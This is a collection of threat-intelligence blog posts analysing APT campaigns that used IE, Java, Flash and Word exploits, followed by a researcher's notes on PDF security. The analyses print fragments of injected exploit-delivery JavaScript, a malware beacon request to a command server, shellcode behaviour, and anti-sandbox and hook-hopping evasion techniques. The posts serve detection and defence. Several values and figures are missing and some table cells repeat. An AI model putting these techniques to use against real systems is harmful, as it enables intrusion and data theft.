FireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer zero-day, CVE-2013-1347, as well as recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign appears to have affected a number of victims based on the use of the Internet Explorer zero-day as well as the amount of traffic observed at making requests to the exploit server. This attack was likely executed by an actor we have named the 'Sunshop Group'. This actor was also responsible for the 2010 compromise of the Nobel Peace Prize website that leverage a zero-day in Mozilla Firefox.

Impacted Sites

The campaign in question compromised a number of strategic websites including:

• Multiple Korean military and strategy think tanks

• A Uyghur news and discussion forum

• A science and technology policy journal

• A website for evangelical students

A call to a malicious javascript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised websites.

The Exploit Server

If a visitor to one of these compromised website was running Internet Explorer 8.0 the malicious javascript would redirect them to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. Any other victims were redirected to a page that downloaded two malicious jars.

if(browser=="Microsoft Internet Explorer" && trim_Version=="MSIE8.0" && window.navigator.userLanguage.indexOf("en")>-1)











Dropped Payloads and C&C Infrastructure

The Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at hk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and control server at dns[.]homesvr[.]tk.

The java exploits were packaged as two different jar files. One jar file had a MD5 of f4bee1e845137531f18c226d118e06d7 and exploited CVE-2013-2423. The second jar file had a MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited CVE-2013-1493.

The jar that exploited CVE-2013-2423 dropped a 9002 RAT with a MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT connected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped a 9002 RAT with a MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at ssl[.]homesvr[.]tk.

All of the above 9002 command and control domains resolved to We previously discussed the extensive use of this RAT in other advanced persistent threat (APT) campaigns here.

Related Infrastructure

After further research into with our friends at Mandiant we uncovered a Briba sample with the MD5 6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to this IP address. As seen in this malwr report, the command and control domain of nameserver1[.]zapto[.]org resolved to the same IP address on 2013-05-07. This Briba sample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:

POST /index000001021.asp HTTP/1.1

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)


Connection: Keep-Alive

Content-Type: text/html

Content-Length: 000041

For a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.

The exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had a MD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5 2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at 9ijhh45[.]zapto[.]org over port 443 using a password of ‘ult4life’. This domain resolved to the same IP between April 2nd and 8th.


The Sunshop Group has utilized the same tactics described above in previous targeted attack campaigns. These similar tactics include the use of zero-day exploits, strategic web compromise as well as Briba malware.

One of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee’s website in 2010.This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.

Another publicly documented attack exploited a Flash zero-day and can be found here. Mila at the Contagio Blog posted additional information on this attack here. This attack dropped the same Briba payload discussed above.

FireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.


CVE Exploit hash Payload hash Malware family C&C Host C&C IP
CVE-2013-1347 CVE-2013-1347 fb24c49299b197e1b56a1a51430aea26 fb24c49299b197e1b56a1a51430aea26 b0ef2ab86f160aa416184c09df8388fe b0ef2ab86f160aa416184c09df8388fe 9002 9002 dns[.]homesvr[.]tk dns[.]homesvr[.]tk
CVE-2013-2423 CVE-2013-2423 f4bee1e845137531f18c226d118e06d7 f4bee1e845137531f18c226d118e06d7 d99ed31af1e0ad6fb5bf0f116063e91f d99ed31af1e0ad6fb5bf0f116063e91f 9002 9002 asp[.]homesvr[.]linkpc[.]net asp[.]homesvr[.]linkpc[.]net
CVE-2013-1493 CVE-2013-1493 3fbb7321d8610c6e2d990bb25ce34bec 3fbb7321d8610c6e2d990bb25ce34bec 42bd5e7e8f74c15873ff0f4a9ce974cd 42bd5e7e8f74c15873ff0f4a9ce974cd 9002 9002 ssl[.]homesvr[.]tk ssl[.]homesvr[.]tk
Unknown Unknown Unknown Unknown 6fe0f6e68cd9cc6ed7e100e7b3626665 6fe0f6e68cd9cc6ed7e100e7b3626665 Briba Briba nameserver1[.]zapto[.]org nameserver1[.]zapto[.]org
CVE-2013-1493 CVE-2013-1493 51aff823274e9d12b1a9a4bbbaf8ce00 51aff823274e9d12b1a9a4bbbaf8ce00 2B6605B89EAD179710565D1C2B614665 2B6605B89EAD179710565D1C2B614665 Poison Ivy Poison Ivy 9ijhh45[.]zapto[.]org 9ijhh45[.]zapto[.]org

LadyBoyle Comes to Town with a New Exploit

[Update: February 12, 2013] By now you have probably heard of the new zero-day exploit in Adobe Flash that was patched today. FireEye Labs identified the exploit in the wild on February 5, 2013, which based on the compile time and document creation time is the same day the malicious payload was generated. Adobe PSIRT has released information about this threat here. They have also released an advisory with details on versions and platforms affected along with applicable patches. The two exploits have been assigned CVE-2013-0633 and CVE-2013-0634. It is highly recommended that you apply this patch right away, as this threat is active in the wild.

We will examine the payload executed as a part of this threat in the wild. We have identified two unique word files containing CVE-2013-0634 so far. It is interesting to note that even though the contents of Word files are in English, the codepage of Word files are "Windows Simplified Chinese (PRC, Singapore)". The Word files contain a macro to load an embedded SWF Flash object.

The SWF file contains an action script with the name “LadyBoyle” that contains the exploit code. The exploit only supports limited version of Flash as evident in the action script seen in Figure 1. It also checks for the presence of activex component.


Figure 1

It drops multiple exe files and a DLL payload. The payload that is dropped and executed when the exploit is successful is also embedded in the SWF file in an SWFTag (Figure 2). The payload is 64-bit and was compiled recently on February 4, 2013. The malware family is not new though and we have seen it being used in attacks before.


Figure 2

One of the dropped executable files is digitally signed with an invalid certificate from MGAME Corporation, a Korean gaming company. The same executable renames itself to try to pass itself off as the Google update process.


Figure 3

It creates startup registry entries for persistence after reboot. The malware checks for presence of the AV processes listed below:





It also creates a configuration file under %appdata%config.sys. This configuration file is XOR encoded with the key ‘0xCF’. The decrypted configuration file is as shown in figure 4. It contains the C2 domain contacted by the malware.


It has a unique callback with the keyword “9002” and beacons to the CnC server at


Figure 5

On mining our database we found multiple domains associated with this threat:

The md5's of crafted document files are listed below:



We will continue to research this threat and provide updates as we find more information.

[Update: February 8, 2013]

Yesterday, we blogged about the new Flash exploit we identified in the wild on February 5, 2013. Since then AlienVault has also published a blog detailing the threat. Peleus Uhley from Adobe published some information on an new feature in the upcoming version of Flash. This feature would identify if Flash content is being run from within an older version of Office that does not have protected mode and warns the user of potentially malicious content before it is executed. Every extra step in making the attackers job more difficult counts.

It is interesting to note, as also observed by AlienVault, that the Flash content and the payloads are not obfuscated or encrypted at all. It is odd and sloppy for a threat attempting industrial espionage.

We continued looking into the payload which is part of this exploit and found some additional interesting behavior. The malware creates a registry entry under "HKEY_CURRENT_USERSoftwareClassessoftbin." The value of this registry key is a large amount of XOR encrypted data. The key used for this encryption was "0xC4." The decrypted data is shown in Figure 6. After some initial data in the decrypted content, it contains an embedded executable. This executable contains code for HTTP POSTS as seen in Figure 7.


Figure 6


Figure 7

After allowing the malware to run for an extended period of time we observed HTTP POSTs being generated by the malware. The URI is incremented sequentially in these requests.


Figure 8

The HTTP post data for these requests is the same as shown below. The CnC server is not responding to the POSTS at this time.


Figure 9

[Update: February 12, 2013]

After further analysis we have confirmed that the exploit used in the analyzed documents is  CVE-2013-0634 and not CVE-2013-0633 as originally stated.



This post was written by FireEye researchers Josh Gomez, Thoufique Haq, and Yichong Lin.

Hackers Targeting Taiwanese Technology Firm

In the past, hackers have attempted to compromise targeted organizations by sending phishing email directly to their users. However, there seems to be a shift away from this trend in the recent years. Hackers were observed to conduct multi-prong approaches to targeting the organization of interest and their affiliated companies. For example, in July 2011, ESTsoft’s ALZip update server was compromised in an attack on CyWorld and Nate users. 1

In one of our investigations, a malicious email was found to be targeting a Taiwanese technology company that deals heavily with the finance services industry (FSI) and the government in Taiwan (see Figure 1 below). To trick the user into opening the malicious document, the attacker made use of an announcement by the Taiwanese Ministry of Finance (see Figure 2).

1. Email

Figure 1. Email targeting Taiwanese technology firm

2. news

Figure 2. Related Taiwanese news — Radio Taiwan International (2012) 2

The malicious document was password-protected using an auspicious number "888888." In Chinese, the number eight (pinyin "BA") is auspicious because it sounds like "FA" (发) which means gaining wealth. By encrypting the malicious payload using the default Word protection mechanism, it would effectively evade pattern-matching detection without using a zero-day exploit. In this case, the attacker has exploited the vulnerability (CVE-2012-0158) in "MSCOMCTL.ocx." The technical analysis will be detailed in the following sections: Protected Document Analysis, Shellcode Analysis, Payload Analysis, and Indicators of Compromise.

Protected Document Analysis

As shown in Figure 3, the ExifTool indicates that the hacker was using a simplified Chinese environment. This is interesting because it contradicts the email content that was written in traditional Chinese, which is the language mainly used in Taiwan.

It was also observed that the malicious Word document loaded "MSCOMCTL.ocx" prior exploiting the application as depicted in Figure 4.


Figure 3. ExifTool information


Figure 4. Loading of MSCOMCTL.OCX

The attacker leveraged CVE-2012-0158 to exploit unpatched Microsoft Word. The vulnerable code inside the MSCOMCTL copied the malicious data into the stack with the return pointer overwritten with 0x27583C30 (see Figure 5). The purpose of overwriting the return pointer is to control the EIP in order to execute the malicious shellcode that is loaded into the stack. The instruction that is disassembled from 0x27583C30 is JMP ESP, which effectively executes the shellcode in the stack (see Figure 6).


Figure 5. Corrupting the stack

6. ForceJmpEsp

Figure 6. JMP ESP

Shellcode Analysis

The shellcode was analyzed to perform the following tasks:

  1. Decrypt and copy the malicious executable (payload) to the temp folder as "A.tmp"
  2. Launch "A.tmp" with WinExec
  3. Delete Word Resiliency registry key (using Shlwapi.SHDeleteKeyA) to prevent Word application from performing recovery
  4. Decrypt and copy the decoy Word document into the temp folder
  5. Launch decoy document using the WinExec command.
    Command line is as follows: cmd.exe /c tasklist&"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" "%temp\%<name of the malicious document> " /q
  6. Terminate compromised Word application

The hook-hopping technique was used heavily by the shellcode to bypass inline-hooking codes patched by API monitoring software such as host-based IPS and AV (see Figure 7). By doing so, the shellcode would be able to invoke the API without the knowledge of the monitoring software. This same technique was also used in the Operation Aurora attack against Google.

7. Hook-hopping

Figure 7. Hook-hopping technique

The body of the shellcode was encrypted using a simple XOR key 0x70 to deter analysis (see Figure 8).

Figure 8. Before/After decrypting shellcode

The encrypted executable and decoy files were embedded within the malicious document at offset 0x10000 and 0x48000 respectively. It was observed that both payloads were encrypted using the same algorithm "counter based XOR with ROR" (see below).

9. Embedded file decryption

Figure 9. Embedded file decryption

Payload Analysis

This APT malware was stealthy and complex due a number of anti-analysis techniques deployed. It made use of multi-staging, hook-hopping, encryption, anti-sandboxing, and anti-disassembly techniques to deter both behavioral and (dynamic/static) code analysis. It is obvious that the attacker took deliberate effort to evade both automated (using signature and sandbox) and manual analysis of the malware to delay or evade detection.

After the shellcode extracted the malicious payload "A.tmp" and the decoy document, "A.tmp" was executed. When "A.tmp" was first executed, it duplicated itself with the filename generated using "GetTempFileName" API with "Del" as prefix. An example of the generated filename is "DelA.tmp." Before "A.tmp" terminates, it executed its duplicate with the following command line parameters: "<process handle> <module path>." The spawned duplicate used the process handle to wait for the termination of "A.tmp" and deleted it using the module path before continuing to execute the rest of the malicious codes.

While debugging "DelA.tmp," it is interesting to note that the anti-sandbox technique is used. The anti-sandbox technique depicted in Figure 10 checks whether the "Sleep" API is manipulated by a sandbox. For example, the Sleep API call could be skipped by a sandbox without accounting for the "accelerated" time. Hence, when the malware tries to get "System Time" interleaved with a Sleep API call, the time difference could be less than a second. In this case, if the time difference before and after sleeping for two seconds is not more than a second, it would then assume to be running inside a sandbox and terminate itself.

10. Anti-Sandbox

Figure 10. Anti-sandbox trick

Before continuing to the next stage of infection, "DelA.tmp" decrypted a resource and injected it into the memory space of the suspended "C:/Windows/Notepad.exe" process that was launched by "DelA.tmp." Before the process was resumed, EAX of the thread context was updated with the starting address of the injected malicious code (see Figure 11). This is because when a process starts, EAX is referenced for the starting address. By doing so, it disrupts debugging. As a counter-measure for analysis, we could make use of memory-modifying software to modify the memory content of Notepad.exe at the address indicated by EAX (0x0100 1130) to become "EB FE" (opcode for JMP -2). By this way, the process would be resumed in a spin-lock manner which allows the analyst to attach a debugger to the process and continue debugging injected malicious code.

11. ModifyEAX

Figure 11. EAX of thread context to point to start of malicious code

To further complicate the situation, the injected code dropped a DLL named "irron.dll" and registered it as a windows service. While debugging this DLL inside "ServiceMain," it was observed that the section named "test" was decrypted. This decrypted content was run as code in a separate thread to deter static code analysis. Inside this newly spawned thread, all the secrets were encrypted and anti-disassembling tricks were used to counter-reverse engineering. For example, strings are deliberately placed in between codes to confuse disassembler due to the code-data duality property (see Figure 12).

12. Anti-Disassembly

Figure 12. Anti-disassembly codes

This Windows service was analyzed to be an information stealer, which has the capability to allow remote control by the attacker with the CnC Server domain as over port 15836 using TCP communication. The figure below reveals how this multi-staged infection was conducted.

13. Flow of Infection

Figure 13. Flow of APT malware infection

Taking a deeper look into the registered domain, it is interesting to see that this domain was registered on September 2012, which was not too long before the attack against the Taiwanese company (see figure below). Additionally, this domain was registered with Shanghai Yovole Networks, Inc. based in China; this could imply that this attack could have originated from China. Additionally, it is observed that the registrar did not validate the name that was used by the attacker. "William" should be read as a name rather as separated first and last name.

14. Registered Malicious Domain

Figure 14. Registered malicious domain


Indicators of Compromise

The presence of the following file, system, and network artifacts (generated by the shellcode and dropped executable payload) could indicate that a computer is compromised.

  1. %temp%/<filename of malicious document>
  2. %temp%/Del%c.tmp (It may in the form of "DelA.tmp" and etc.)
  3.  %windir%/System32/irron.dll
  4. Event name "DragonOK"
  5. Registered service "irmon" with description, "The irmon service monitors for infrared devices such as mobile phones, and initiates the file transfer wizard."
  6. Resolving to "" and connects to "15836"


Targeted attacks are continuing to be real threats where one incident is considered too many. In this example, we can see that the attack plan was deliberated. Hackers attempt to hit their target by phishing companies that are affiliated with them. This could be even more effective than spear phishing their well-defended targets. Hence, it is recommended that organizations ensure that all their closely affiliated companies are at least equally protected.

Additionally, a number of tell-tale signs indicate that this malware could have originated from China. Firstly, the Word document was created in a simplified Chinese environment despite the use of traditional Chinese inside the email body. Secondly, the domain was registered with a company located in Shanghai. Thirdly, the malware used the event name "DragonOK," where Dragon is an auspicious creature in Chinese mythology and folklore.

Lastly, we observed that APT malware is becoming increasingly complex with the use of anti-analysis techniques. Hence, it is important to defend the organization against traditional and modern threats through policy, awareness programs, and technologies.


1 Command Five Pty Ltd. (September, 2011). SK Hack by an Advanced Persistent Threat. Retrieved from

2 Radio Taiwan International. (28 11, 2012). Retrieved from

3 Liston, T., & Skoudis, E. (2006). On the Cutting Edge: Thwarting Virtual Machine Detection. 


CFR Watering Hole Attack Details

[Updated on December 30, 2012] On December 27, we received reports that the Council on Foreign Relations (CFR) website was compromised and hosting malicious content on or around 2:00 PM EST on Wednesday, December 26. Through our Malware Protection Cloud, we can confirm that the website was compromised

at that time, but we can also confirm that the CFR website was also hosting the malicious content as early as Friday, December 21—right before a major U.S. holiday.

We can also confirm that the malicious content hosted on the website does appear to use Adobe Flash to generate a heap spray attack against Internet Explorer version 8.0 (fully patched), which was the source of the zero-day vulnerability. We have chosen not to release the technical details of this exploit, as Microsoft is still investigating the vulnerability at this time.

In the meantime, the initial JavaScript hosting the exploit has some interesting features. To start, it appears the JavaScript only served the exploit to browsers whose operating system language was either English (U.S.), Chinese (China), Chinese (Taiwan), Japanese, Korean, or Russian:

var h=navigator.systemLanguage.toLowerCase();
if(h!="zh-cn" && h!="en-us" && h!="zh-tw" && h!="ja" && h!="ru" && h!="ko")

Also, the exploit used browser cookies to ensure that the exploit is only delivered once for every user:

var num=DisplayInfo();
if(num >1)

where DisplayInfo() essentially tracked when the page was last visited through browser cookies:

function DisplayInfo()
    var expdate = new Date();
    var visit;
    expdate.setTime(expdate.getTime() +  (24 * 60 * 60 * 1000*7 ));
    if(!(visit = GetCookie("visit")))
    visit = 0;
    SetCookie("visit", visit, expdate, "/", null, false);
    return visit;

Once those initial checks passed, the JavaScript proceeded to load a flash file "today.swf", which ultimately triggered a heap spray in Internet Explorer in order to complete the compromise of the endpoint.

Once the browser is exploited, Prior to downloading the exploit, the browser appears to download “xsainfo.jpginto the browser cache (aka "drive-by cache attack"), which is the dropper encoded using single-byte XOR (key: 0x83, ignoring 0x00 and 0x83 bytes). Once the exploit succeeds, the JPG file is decoded as a DLL, which is written to the %TEMP% folder as "flowertep.jpg", the sample (MD5: 1e90bd550fa8b288764dd3b9f90425f8) (MD5: 715e692ed2b48e455734f2d43b936ce1) appears to contain debugging information in the metadata of the file:


The simplified Chinese <文件说明> translates to <File Description>. It looks like the malware author included additional metadata in the file, referencing "test_gaga.dll" as the internal name of this sample.

[Update: December 30, 2012]

Additionally, another binary "shiape.exe" (MD5: a2e119106c38e09d2202e2a33e64adc9) is initially dropped to the %TEMP% folder and executed, which appears to perform code injection activity against the standard IE "iexplore.exe" process and installs itself as "%PROGRAMFILES%\Common Files\DirectDB.exe", using the HKLM\SOFTWARE\STS\"nck" registry key to maintain state information. We can also confirm Jamie Blasco's (AlienVault) findings, where the malware registers "DirectDB.exe" through the active setup registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed

Components\, so that this executable starts once per user upon subsequent login. However, while AlienVault's IOC mentions a process handle name of "&!#@&", we have actually found the "shiape.exe" process generates a mutex of \BaseNamedObjects\&!#@& upon execution, as well.

As of December 29, Microsoft released a security advisory (2794220), which provides initial details of the zero-day vulnerability. Additionally, CVE-2012-4792 has been assigned to track this vulnerability over time.

Simultaneously, Metasploit developers have analyzed the vulnerability and Eric Romang released details of the CDwnBindInfo Proof of Concept Vulnerability demonstration for independent verification.

Lastly, Cristian Craioveanu and Jonathan Ness with MSRC Engineering posted further technical details on MS Technet about ways to mitigate CVE-2012-4792, in the meantime. 

One interesting side-note that MSRC mentioned is:

On systems where the vulnerability is not present, this Javascript snippet will have the side effect of initiating an HTTP GET request with the encoded heap spray address in it. A network log or proxy log would reveal the following HTTP requests:

GET /exploit.html HTTP/1.1

GET /%E0%B4%8C%E1%82%AB HTTP/1.1

As you can see, the value 0x10AB0C0D is encoded in UTF8 and sent as part of the HTTP request. The real-world exploits do not use and the heap spray address will vary depending on targeted OS platform and exploit mechanism but if you see encoded memory addresses in your proxy log, you should investigate to determine whether your organization has been targeted.

Yet, in the wild, we have seen cases where a successfully compromised endpoint generates an equivalent encoded pattern:


... and still beacons (via HTTP POST) to the initial command and control infrastructure at [REDACTED].yourtrap.comTherefore, we encourage security operations analysts to fully investigate endpoints that generate the encoded heap spray network traffic, rather than simply assuming those systems are not compromised.

We will continue to update this blog with further details, as we discover new information about this attack.

OMG-WTF-PDF Dénouement

You may have heard something in the news about PDF recently… By the power of Google!

What's all this then?

I gave a presentation at the 27th Chaos Computer Congress in Berlin.

For some reason, the slides never made it from Pentabarf to the Fahrplan. You can view them here: 27C3_Julia_Wolf_OMG-WTF-PDF.pdf

(I have had so many requests for these.)

The talk was approximately a twenty minute summary of about 2,500 pages of dense technical documentation, twenty minutes of I wonder what Acrobat does if I feed it this., and a little bit of (incomplete) stuff about A/V programs —

because every talk like this has to mention A/V because everyone asks about it. Speaking of which: if anyone would like to perform a rigorous test of how well A/V detects obfuscated PDFs, please go right ahead; I have neither the time nor interest.

(That 2,500 is just for the ISO spec, PDF32000_2008.pdf; the Javascript Reference 8.1 from the SDK, js_api_reference.pdf ; and the XML Forms Architecture Specification 2.6, xfa_spec_2_6.pdf. I'm not counting the 3D Annotation specification, XMP specification, nor any of the font specifications.)

I was inspired by the 2009 work of Meredith L. Patterson, Len Sassaman, Moxie Marlinspike, Dan Kaminsky, Sergey Bratus, and any one else I may have forgotten, on ambiguities in ASN.1 and X.509 parsing.

As I read through the PDF ISO specification two years ago, certain oddities jumped out at me. I can't possibly be the first person to have read the specification and noticed this stuff, right? Right?

Can you really just execute arbitrary programs from a PDF? [Answer: Yes (And more than one PDF reader does this!)]

While reading the ISO 32000-1 [PDF] document - or really any technical specification - what you really need to pay the most attention to, is what is not said. Not only is ISO 32000-1 absent of any formal language definition (BNF, etc.) but many possible glosses which can be formed that are not defined. (As it says right at the very beginning of the ISO 32000-1, there's nothing in this document that defines whether or not a PDF file is well-formed or not.

It's called Adobe Acrobat because it'll bend over backwards!

Since I started presenting this, several unrelated people have told me that they were using foo-trick, or bar-trick for years, but I seem to be the first person to stand in front of a room, and tell people about it for an hour. (Well, that and the first to make hybridized PDF files.)

Considering the existence of PDF/A, a committee somewhere must have had the same ideas about tightening up the PDF specification.

Part of the original brainstorm for this talk, was to create a chart of features/quirks across several different PDF readers and versions.

That could have taken way more time, than I could have invested at the time.

If anyone would like to actually perform these tests, I encourage you to please do so, and publish your results. I'll be posting the test files I used for my talk soon.

Live in Person

iSec Open Forum

I'm speaking at the iSEC Open Forum Bay Area next week. This is the info I have on it:

iSEC Open Forum Bay Area


DATE: Thursday, February 3, 2011


TIME: 6:00pm-9:00pm


LOCATION: Intuit Building 9, Cook Conference Room
                  2600 Casey Ave
                  Mountain View, CA 94043

Please visit or RSVP to rsvp @ if you wish to attend!

***technical managers and engineers only please***

***food and beverage provided***


I'm also speaking at TROOPERS in Heidelberg, Germany on Mar 28-Apr 1, 2011. It will be about PDF, but not the same stuff as 27C3.


Adobe Reader X

I wrote the bulk of this talk back in May for PH-Neutral 0x7DA. Adobe Acrobat X

hadn't even been announced yet. The CCC submission deadline was three months ago.

A month before my talk, Adobe Reader X is released.

So, I should have updated my talk to mention Acrobat X more prominently, rather than in passing at the end. However, I've done no testing with it at all.

If you haven't heard yet, Adobe Acrobat X is running (most) of itself within a sandbox. Which is probably the only feasible way for Adobe to secure Acrobat. I tested my tiny Javascript-launching PDF test file in it, and still worked just like 9.0, and that's about all I know currently about its parser.

About PDF Printer Engines

So, I did not say that you can scan a network from a printer with a PDF. I was speculating about just how much of the PDF spec a printer may implement.

If it did implement the whole thing, then crazy stuff like scanning a network via a printer would be possible, and I'd be very surprised if any printer maker would ever do that.

I've been informed by someone familiar with HP printers, that the HP PDF engine does not execute Javascript. I have no information about any other printer.

Not OpenGL

I reread the ISO specification, and found that it says that 3D data is encoded in the Universal 3D format (ECMA-363); Not OpenGL like I said.

Error in Presentation Tests

Paul Baccas has a pretty good summary of most public research on this kind of thing here:

He's quite possibly the only other person on Earth who's actually read through my test files, and actually found an error with one.

Most of my tests were written in one day. I think I spent maybe five minutes on the duplicate object tests, so messing up the startxref is no surprise.

This means that Slide 123, and Slide 124 in the

27C3 [PDF] talk

are the exact opposite of what they should say. The first Object will be used if xref points to it, otherwise if ref is broken, the last Object defined is used.

(This actually seems much more consitant with Acrobat's other behaviors.

Stuff I forgot to mention

PDF syntax seems to have been influenced by TeX

Office, OpenOffice, and iWork documents are ZIP files; Java ARchives are ZIP files. Use your imagination.


I can barely fit the information I've got into 50 minutes. Acrobat has a lot of code, I mean A LOT, A LOT. Load it in gdb sometime and just list the symbols. It'll take about half an hour on a 2GHz Macbook.

That said, I should have at least mentioned PDF/A, and it's cousin PDF/X.

Short summary (what I'd say in my talk): PDF/A is a stripped down version of the PDF-1.4 spec, with mandatory font embedding, and without Javascript and all that nonsense,

and tighter requirements on the PDF syntax itself. For example, the first byte of "%PDF-" must be at file offset zero. I don't know how many readers enforce these things in practice.

The official ISO documentation is available for sale here:

Currently, it costs about US$125 if you'd like to buy a copy. There are actually several documents, but I think this is the main one. (I haven't read it.)

What of PDF/A? Attackers won't use it. Currently, an attacker can buy advertising which points to some HTML/JS which launches Acrobat in the browser to display a malicious PDF. And then the user gets 0wned. Happens thousands of times a day. Well, that and you don't need Javascript or other interactive features to exploit a PDF reader.

PDF/X is a stripped down (e.g. no Javascript) version of PDF-1.4 which has been created for the publishing industry. So there's lots of stuff about CMYK color space, embedded fonts, and trim area verses bleed area. There are several ISO documents which describe PDF/X

PDF/UA is for Universal Accessibility, screen readers and the like. It should also make it possible to easily convert a PDF into a plain text document.

PDF/E PDF for Engineers, just read the Wiki page on it.


One More Thing

While Googling around to write this blog post, I discovered this: It's a PDF Syntax Validator. I don't know anything else about it other than what it says on that web page.

Frequently Asked Questions

I've got this dialogue going on in my head about many of the comments I've heard…


The Firſt Dialogue


Salviati, Sagredo, and Simplicio.

Salviati: IT was our yeſterdayes reſolution, and agreement,

that we ſhould to day diſcourſe the moſt

diſtinƈ tly,

and particularly we

could poſſible of the natural reaſons, and

their efficacy that have been hitherto alledged on the one or other part, by the

maintainers of the Positions, Aristotelian, and Ptolomaique; and by the followers of the Portable Document Syſteem .

Sagredo: It has been evidently demonstrated that PDF sekurite is not good; What may be done in time to come? And forgive me if I continue in Modern English in order to save time.

Simplicio: You will be safe long as you keep patching your PDF software. And besides it will take a long time to learn how to use a new PDF reader.

Salviati: You will not be safe by just patching. Acrobat and Flash have had an actively-used-in-the-wild to install malware, zero-day, about every two months for the last three years. Sure, all PDF readers have vulnerabilities, and switching software is just exchanging one set of problems for another. However, most PDF readers won't run Javascript or play Flash upon open; The attack surface is much much smaller. And really, a PDF reader is not hard to use. (Open file, read stuff, quit.)

Simplicio: Users should only open documents from people they trust.

Salviati: Most attacks performed via PDFs are drive-by attacks, that is, a malicious web page (sometimes a modified legitimate one, or a paid advertisement) instructed your web browser to open a PDF file in Acrobat. You don't have a choice in opening the malicious PDF file.

Simplicio: Everyone should switch to using PDF/A!

Salviati: Yes, let's have all the malware authors use PDF/A from now on!

This doesn't help mitigate vulnerabilities like integer overflows in embedded image handlers.

You could get everyone to reject old-style PDF documents, and only accept PDF/A…

You'd need to convert every single old PDF document on earth, but keep in mind that documents that accept form input won't function as a PDF/A. And you need everyone to throw out their old vulnerable PDF readers.

Sagredo: What's a good PDF reader to use that's not Adobe Acrobat?



Appendix A

This is a list of every version of my talk presented to more than 20 people at a time.

It's mostly the same talk each time, except with some new stuff added from the last time I presented it.

May 29, 2010 ph-neutral 0x7da PH-Neutral2010.pdf

Sep 09, 2010 SEC-T 2010 Sec-T_2010_Julia_Wolf_final.pdf

Oct 24, 2010 ToorCon 12 San Diego Julia_Wolf_ToorCon12_OMG_WTF.pdf

Oct 27, 2010 SecTor 2010 Julia_Wolf_SecTor_OMG_WTF.pdf

Dec 11, 2010 BayThreat 2010 BayThreat2010.pdf

Dec 30, 2010 27th Chaos Communication Congress 27C3_Julia_Wolf_OMG-WTF-PDF.pd

[Part 1/4]

[Part 2/4]

[Part 3/4]

[Part 4/4]

Appendix B

On Sep 9, 2010, just after my presentation at Sec-T, I was interviewed by a reporter. This was the result:

Included here by permission of the copyright holder.

Adobe Reader is a tremendous risk
by Frida Sundkvist

Do you have Adobe Reader installed? Then neither your documents nor passwords are protected completely. Expert advice is to replace the PDF reader while Adobe solves the problems.

The last year has highlighted many security problems with PDF files. Often it's enough that a user has a PDF reader installed to be targeted by an attack.

– PDF is the biggest threat today. You can do almost anything without being detected. Adobe Reader is a tremendous risk, says Julia Wolf, security researcher at Fire Eye.

Julia Wolf is in Stockholm to speak at the Sec-T Security Conference. She says that despite that, it is good that people are discovering the problems with Adobe Reader or other PDF readers.

– My advice is to uninstall Adobe Reader and select another PDF reader,

she says

There are major weaknesses in the pdf format which means that infected

files are difficult to detect and there are also vulnerabilities in Adobe

Reader. Since PDF reader is by far the most popular, hackers have put most

of their resources into targeting Adobe.

A pdf-attack often goes unnoticed. If the user has a PDF reader installed, it may be enough to accidentally go to the wrong website. Seconds later, your personal documents uploaded to a waiting third party. Your keystrokes are recorded and thus more people than you may know your password.

– I have heard many different amounts on how much money companies lose. The conclusion is that there is a lot, she says.

In May Julia Wolf experimented with rewriting a pdf file to see if antivirus software detected the infected file. Only nine of 41 anti-virus detected it. The remaining 32 anti-virus programs, didn't detect it. No surprise, says Julia Wolf.

Thomas Kristensen, security expert at Secunia, is on the same track. If users in a company do not need very advanced PDF files, the company should

consider changing pdf readers.

– If you are a criminal and want to cause as much harm as possible, which route do you choose? In almost all cases, you choose Adobe Reader before for example Foxit, he says.

Two things will help if you still want to keep Adobe Reader. The first is according to Thomas Kristensen to disable two things: the Flash Plugin and Javascript support. The second he says is instructing employees to only open files they need in their work.

Per Hellqvist, security expert at Symantec, does not think that the solution is to uninstall Adobe Reader, but he understands that line of thinking. He argues instead that it's most important to patch, that is to say to update the security settings in Reader.

– All PDF readers have security holes and it can take a long time to train users to use a new program, he says.

The only way to be protected from PDF attacks is to not have a PDF reader installed. Towards the end of the year, comes the next update for Adobe

Reader. This version will have isolated the program itself within a "sandbox" (see article above).

Photo Caption: [Some kind of Swedish idiom about poking fun at security, or saws, or something] Problems with Adobe Reader have been known for a

long time. "You can do almost anything without being detected," said Julia Wolf, security researcher at Fire Eye, which calls on companies to use a

different PDF reader until Adobe sorts out its program.

Appendix C

I can read French better than Google Translate, so this is the relevant excerpt from

The vulnerabilities of PDF

This last decade, the Portable Document Format, or PDF, is now clearly the most common format for the publication of electronic documents.

It is used in the publishing industry as a reference format as much for printing as for the publication of ebooks.

And the PDF reference implementation is still and always the popular Adobe Acrobat, in both versions, Writer or simply "Reader".

Unfortunately, as Julia Wolf has mentioned in her presentation, PDF is a standard that has more or less been agglomerated over the needs of it's original version, and Acrobat is the result of this organic evolution: more than 15 million lines of code, Acrobat is bigger than Mozilla firefox, bigger than the Linux kernel and the majority of the code was written in the '90s, in Adobe's secret laboratories.

The result is that it's possible to easily fool Acrobat.

